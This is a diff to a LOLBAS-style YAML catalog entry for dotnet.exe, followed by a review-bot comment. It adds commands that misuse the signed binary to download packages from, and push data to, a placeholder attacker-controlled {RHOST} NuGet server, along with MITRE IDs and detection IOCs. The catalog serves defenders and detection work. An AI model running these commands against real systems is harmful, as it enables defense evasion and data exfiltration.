28 changes: 27 additions & 1 deletion yml/OtherMSBinaries/Dotnet.yml
Expand Up @@ -40,21 +40,47 @@ Commands:
OperatingSystem: Windows 10 and up with .NET Core installed
Tags:
- Execute: CSharp
- Command: dotnet.exe restore --source http://{RHOST}/packages/ {PATH:.csproj}
Description: dotnet.exe will download NuGet packages (.nupkg) from an arbitrary HTTP server specified via the --source flag.
Usecase: Download files from a remote attacker-controlled server using a Microsoft-signed binary. Traffic goes over HTTP/HTTPS as NuGet protocol requests.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10 and up with .NET SDK installed
Tags:
- Download: HTTP
- Command: dotnet.exe nuget push {PATH:.nupkg} --source http://{RHOST}/api/v2/package --api-key {APIKEY}
Description: dotnet.exe will upload a NuGet package (.nupkg) to an arbitrary HTTP server via HTTP PUT request.
Usecase: Exfiltrate data by packaging it as a .nupkg file and pushing it to an attacker-controlled NuGet server. A .nupkg is a ZIP file that can contain arbitrary data.
Category: Upload
Privileges: User
MitreID: T1048
OperatingSystem: Windows 10 and up with .NET SDK installed
Tags:
- Upload: HTTP
Full_Path:
- Path: 'C:\Program Files\dotnet\dotnet.exe'
- Path: C:\Program Files\dotnet\dotnet.exe
- Path: C:\Program Files (x86)\dotnet\dotnet.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: dotnet.exe spawned an unknown process
- IOC: dotnet.exe making outbound HTTP connections to non-standard NuGet sources
- IOC: dotnet.exe command line containing --source with non-Microsoft URLs
- IOC: dotnet.exe nuget push command uploading to external servers
Resources:
- Link: https://twitter.com/_felamos/status/1204705548668555264
- Link: https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc
- Link: https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/
- Link: https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/
- Link: https://learn.microsoft.com/en-us/dotnet/core/tools/dotnet-restore
- Link: https://learn.microsoft.com/en-us/dotnet/core/tools/dotnet-nuget-push
Acknowledgement:
- Person: felamos
Handle: '@_felamos'
- Person: Jimmy
Handle: '@bohops'
- Person: yamalon
Handle: '@mavinject'
- Person: Noam
Handle: '@pumi96'
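Review bot: The new Download entry (the `dotnet.exe restore --source http://{RHOST}/packages/ {PATH:.csproj}` command and its Description) omits what actually triggers the download and where the file lands: restore only fetches packages that the given .csproj declares as a PackageReference and that are not already in the local cache, the `--source` value overrides the sources configured in nuget.config, and the fetched .nupkg is extracted into the NuGet global packages folder (%USERPROFILE%\.nuget\packages by default), not next to the project. Suggest stating this in the Description or Usecase, e.g. "requires a .csproj referencing the package; the package is written to the global packages folder", so the entry is reproducible and the IOC "dotnet.exe making outbound HTTP connections to non-standard NuGet sources" can be paired with a file-system location to watch. Two smaller points: the Upload entry could note that {APIKEY} can be any value, since the attacker controls the receiving server, and T1048.003 (Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol) is a more precise MitreID than the parent T1048 for a plain HTTP PUT.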